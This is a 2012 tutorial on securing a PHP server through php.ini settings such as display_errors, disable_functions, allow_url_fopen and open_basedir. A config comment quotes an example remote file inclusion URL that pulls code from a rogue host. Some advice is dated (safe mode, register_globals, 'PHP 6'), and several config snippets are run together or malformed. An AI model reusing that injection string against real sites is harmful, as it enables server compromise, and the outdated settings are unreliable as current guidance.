Introduction
PHP is a widely-used, general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. The code is interpreted by a Web server with a PHP processor module that generates the resulting Web page. It also has evolved to include a command-line interface capability and can be used in standalone graphical applications. PHP can be deployed on most Web servers and also as a standalone shell on almost every operating system and platform, free of charge.
Secure PHP Configuration
In this tutorial you will see the principles on how to secure your PHP Configuration file. PHP has a lot of badly coded scripts which can be abused by malicious users, but there are some basic things you can do to make PHP more secure.
(Note: For the purpose of this tutorial BackBox (Based on Ubuntu) as OS and the latest installation of PHP will be used. There are no guarantees or absolutes for PHP security things, so proceed at your own risk.)
First, locate the directory in which the PHP configuration file is located by typing the following command:
sudo locate php.ini
By default the php.ini file is located in /etc/php5/apache2/php.ini but running the code above will give full details of which directory in which it can be found.
root@liatsisfotis:~# locate php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini.save
(Note: This directory may differ from yours, depending on whether you changed the destination folder during the installation process and on the OS that is used.)
The php.ini file can be opened using an editor; in this case, GNU nano:
sudo nano /etc/php5/apache2/php.ini
Messaging and Logging
PHP by default prints message errors to the browser output displaying a lot of security information such as installation path, version or usernames, so disable them by modifying the following settings.
display_errors = Off
log_errors = On
error_log = syslog
ignore_repeated_errors = On
Disallow Harmful Functions
Disable system functions that allow scripts to execute commands. To disable functions add their name to the disable_functions option.
disable_functions = dl, phpinfo, system
Time Limits
Limits can be put on PHP’s execution time, memory usage, post and upload data by changing the following options:
# Maximum execution time of each script, in seconds
max_execution_time = 30max_input_time = 60# Maximum amount of memory a script may consume (8MB)
memory_limit = 8M# Maximum size of POST data that PHP will accept.
post_max_size = 8M# Whether to allow HTTP file uploads.
file_uploads = Off# Maximum allowed size for uploaded files.
upload_max_filesize = 2M
Disable Remote Files
PHP allows files to be opened remotely using simple scripts that use the fopen function. If there is a script that tries to open a file and the filename is controllable by a remote user two things can happen:
Any file on the local system which the webserver can read can be viewed by the remote attacker.
Arbitrary commands can be executed upon your server if the user can cause a remote PHP file to be opened.
To disable this attack set the following in your php.ini file:
#Whether to allow the treatment of URLs (like http:// or ftp://) as files.
#This is turned off to avoid variable redefinition by remote attacker
#that attempts to have the server download (and execute) a remote file
#from a compromised host. This behaviour has been observed in automatic
#scanning against badly written applications:
#http://myhost/myapplication.php?include=http://roguesever/rogueapp.php
#disable remote URLs for file handling functions
allow_url_fopen = Off
Register Globals
PHP version 5.3.5 used to provide input values as global variables. This option is responsible for many security issues if the code in not very well thought out, so you should do your best to write your scripts so that they do not require register_globals to be on.
register_globals = Off
Read – Write Permissions
PHP can limit what fopen and other file access functions can read and write defined by a directory. This directive makes most sense if used in a pre-directory or pre-virtualhost web server configuration file and also is not effected by whether Safe Mode is turned On or Off.
open_basedir = /var/www/files/docs
Safe Mode
PHP Safe Mode is a security feature that was designed to prevent malicious users from being able to use PHP scripts to execute commands at the operating system level. It was intended to be a security method for web applications running on shared hosting accounts, as virtual private servers (VPS) and dedicated servers running single web hosting accounts did not need it. It never functioned well, however, and PHP developers have removed it from the upcoming version 6 release. The primary problem is that some basic functions required by web scripts would simply not work with PHP safe mode enabled.
safe_mode = Off
Because in Safe Mode files, access to environment variables and execution of binary programs that are not owned by Apache are disabled the option safe_mode_gid can be changed from Off to On in order that PHP will be able to open files that belong to Apache’s group regardless of the owner.
safe_mode_gid = On
In Safe Mode, the user may only alter environment variables whose names begins with the prefixes supplied here. By default, users will only be able to set environment variables that begin with PHP_ (eg. PHP_FOO).
safe_mode_allowed_env_vars = PHP_
Also when safe mode is enabled, only executables located in the safe_mode_exec_dir will be allowed to be executed via the exec family of functions.
safe_mode_exec_dir = /var/www/executables
Hiding PHP Information
PHP may expose the fact that it is installed on the server by showing the php version, installation paths or adding its signature to the Web server header. We can disable this by modifying the following option:
expose_php = Off
Limit Access to Certain File
We can allow access to the specific directories prohibiting default access to the filesystem locations by placing the following Apache
directive in a .htaccess file or in Apache’s configuration.
<filesmatch>
Order allow,deny
Deny from all
</filesmatch>
Tip
To determine the PHP options, create a php info file called phpinfo.php which will contain the following code:
< ?php
phpinfo();
?>
(Note: It is recommended that the php file is deleted when the web server is online.)
Conclusion
There is a lot of ways and things that can be done to secure your PHP. This tutorial describes the basic things that can be done to make PHP more secure. The best way is to try every parameter in a localhost web server to figure out what the option does before proceeding to the main web server / PHP Configuration file.
Designed and Created by Liatsis Fotis
© 2012 Liatsis Fotis
Clik here to view.
